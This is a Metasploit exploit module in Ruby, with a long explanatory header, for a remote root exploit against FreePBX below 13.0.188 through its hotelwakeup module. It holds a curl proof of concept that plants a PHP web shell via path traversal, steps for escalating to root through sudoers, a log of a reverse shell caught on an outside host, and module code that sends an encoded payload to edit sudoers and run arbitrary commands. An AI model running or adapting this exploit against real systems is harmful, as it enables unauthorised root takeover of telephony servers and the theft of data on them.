240 lines
No EOL
10 KiB
Ruby
Executable file
240 lines
No EOL
10 KiB
Ruby
Executable file
#Title : Freepbx < 13.0.188 , Remote root exploit
|
|
#Vulnerable software : Freepbx < 13.0.188
|
|
#Author : Ahmed Sultan (0x4148)
|
|
#Email : 0x4148@gmail.com
|
|
#Current software status : patch released
|
|
#Vendor : Sangoma <freepbx.org>
|
|
|
|
=begin
|
|
Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking
|
|
Technical details
|
|
Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php
|
|
Line 102 :
|
|
public function generateCallFile($foo) {
|
|
...............................
|
|
if (empty($foo['filename'])) {
|
|
$foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable
|
|
}
|
|
...........................
|
|
// Delete any old .call file with the same name as the one we are creating.
|
|
if(file_exists($outfile) ) {
|
|
unlink($outfile);
|
|
}
|
|
// Create up a .call file, write and close
|
|
$wuc = fopen($tempfile, 'w');
|
|
fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" );
|
|
fputs( $wuc, "maxretries: ".$foo['maxretries']."\n");
|
|
fputs( $wuc, "retrytime: ".$foo['retrytime']."\n");
|
|
fputs( $wuc, "waittime: ".$foo['waittime']."\n");
|
|
fputs( $wuc, "callerid: ".$foo['callerid']."\n");
|
|
fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n"); <<<<<---------------------Vulnerable
|
|
fputs( $wuc, "application: ".$foo['application']."\n");
|
|
fputs( $wuc, "data: ".$foo['data']."\n");
|
|
fclose( $wuc );
|
|
..........................
|
|
The ext value can be manipulated by the attacker to change the output file path
|
|
the language value can be manipulated by the attacket to load in malicious contents
|
|
Function is called at
|
|
Line 94 :
|
|
public function addWakeup($destination, $time, $lang) {
|
|
$date = $this->getConfig(); // module config provided by user
|
|
$this->generateCallFile(array(
|
|
"time" => $time,
|
|
"date" => 'unused',
|
|
"ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field]
|
|
"language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code]
|
|
"maxretries" => $date['maxretries'],
|
|
"retrytime" => $date['retrytime'],
|
|
"waittime" => $date['waittime'],
|
|
"callerid" => $date['cnam']." <".$date['cid'].">",
|
|
"application" => 'AGI',
|
|
"data" => 'wakeconfirm.php',
|
|
));
|
|
}
|
|
addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command
|
|
Line 60 :
|
|
switch($_REQUEST['command']) {
|
|
case "savecall":
|
|
if(empty($_POST['language'])) {
|
|
$lang = 'en'; //default to English if empty
|
|
} else {
|
|
$lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<===========================
|
|
}
|
|
............................................
|
|
if ($badtime) {
|
|
// abandon .call file creation and pop up a js alert to the user
|
|
return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup)));
|
|
} else {
|
|
$this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<=======================
|
|
return array("status" => true);
|
|
}
|
|
.................................
|
|
POC :
|
|
[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"
|
|
{"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}#
|
|
|
|
The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call
|
|
the server will ignore.call extn and will execute the php
|
|
|
|
[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call"
|
|
channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm
|
|
maxretries: 3
|
|
retrytime: 60
|
|
waittime: 60
|
|
callerid: Wake Up Calls <*68>
|
|
set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
|
|
uid=499(asterisk) gid=498(asterisk) groups=498(asterisk)
|
|
application: AGI
|
|
data: wakeconfirm.php
|
|
|
|
Privelage can be escalated via adding the asterisk user to sudoers which can be done manually
|
|
then echo a > /var/spool/asterisk/sysadmin/amportal_restart
|
|
sleeping for few seconds
|
|
then sudo bash -i
|
|
|
|
MSF OUTPUT
|
|
msf > use exploit/fpbx
|
|
msf exploit(fpbx) > set RHOST 68.170.92.50
|
|
RHOST => 68.170.92.50
|
|
msf exploit(fpbx) > set RPORT 8080
|
|
RPORT => 8080
|
|
msf exploit(fpbx) > exploit
|
|
|
|
[*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443
|
|
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . .
|
|
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload
|
|
[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed
|
|
[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell <taking around 20 seconds in case of success>
|
|
|
|
id
|
|
uid=0(root) gid=0(root) groups=0(root)
|
|
sh -i
|
|
sh: no job control in this shell
|
|
sh-4.1# pwd
|
|
pwd
|
|
/var/www/html
|
|
sh-4.1# whoami
|
|
whoami
|
|
root
|
|
sh-4.1#
|
|
=end
|
|
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit4 < Msf::Exploit::Remote
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'FreePBX < 13.0.188.1 Remote root exploit',
|
|
'Description' => '
|
|
This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup
|
|
',
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module
|
|
],
|
|
'References' =>
|
|
[
|
|
"NA"
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'perl telnet python'
|
|
}
|
|
},
|
|
'Platform' => %w(linux unix),
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' => [['Automatic', {}]],
|
|
'Privileged' => 'false',
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Sep 27 2016'))
|
|
end
|
|
|
|
def print_status(msg = '')
|
|
super("#{rhost}:#{rport} - #{msg}")
|
|
end
|
|
|
|
def print_error(msg = '')
|
|
super("#{rhost}:#{rport} - #{msg}")
|
|
end
|
|
|
|
def print_good(msg = '')
|
|
super("#{rhost}:#{rport} - #{msg}")
|
|
end
|
|
|
|
# Application Check
|
|
def check
|
|
res = send_request_cgi(
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
|
|
'headers' => {
|
|
'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff"
|
|
},
|
|
'vars_post' => {
|
|
'module' => 'hotelwakeup',
|
|
'command' => 'savecall'
|
|
}
|
|
)
|
|
|
|
unless res
|
|
vprint_error('Connection timed out.')
|
|
end
|
|
if res.body.include? "Referrer"
|
|
vprint_good("Hotelwakeup module detected")
|
|
return Exploit::CheckCode::Appears
|
|
else
|
|
Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
def exploit
|
|
vprint_status('Sending payload . . .')
|
|
pwn = send_request_cgi(
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
|
|
'headers' => {
|
|
'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall",
|
|
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
|
|
'User-agent' => "mostahter ;)"
|
|
},
|
|
'vars_post' => {
|
|
'module' => 'hotelwakeup',
|
|
'command' => 'savecall',
|
|
'day' => 'now',
|
|
'time' => '+1 week',
|
|
'destination' => '/../../../../../../var/www/html/0x4148.php',
|
|
'language' => '<?php echo "0x4148@r1z";if($_GET[\'r1zcmd\']!=\'\'){system("sudo ".$_GET[\'r1zcmd\']);}else{fwrite(fopen("0x4148.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwppbXBvcnQgdGltZQojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLSAKY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXAoJJ05PUEFTU1dEXDpBTEwiXD5cPlwvZXRjXC9zdWRvZXJzL2dcJyAvdmFyL2xpYi8nIFwKCSdhc3Rlcmlzay9iaW4vZnJlZXBieF9lbmdpbmUnCm9zLnN5c3RlbShjbWQpCm9zLnN5c3RlbSgnZWNobyBhID4gL3Zhci9zcG9vbC9hc3Rlcmlzay9zeXNhZG1pbi9hbXBvcnRhbF9yZXN0YXJ0JykKdGltZS5zbGVlcCgyMCk="));system("python 0x4148.py");}?>',
|
|
}
|
|
)
|
|
#vprint_status("#{pwn}")
|
|
vprint_status('Trying to execute payload <taking around 20 seconds in case of success>')
|
|
escalate = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),
|
|
'vars_get' => {
|
|
'0x4148' => "r1z"
|
|
}
|
|
)
|
|
if escalate.body.include? "0x4148@r1z"
|
|
vprint_good("Payload executed")
|
|
vprint_status("Spawning root shell")
|
|
killit = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),
|
|
'vars_get' => {
|
|
'r1zcmd' => "#{payload.encoded}"
|
|
}
|
|
)
|
|
else
|
|
vprint_error("Exploitation Failed")
|
|
end
|
|
end
|
|
end |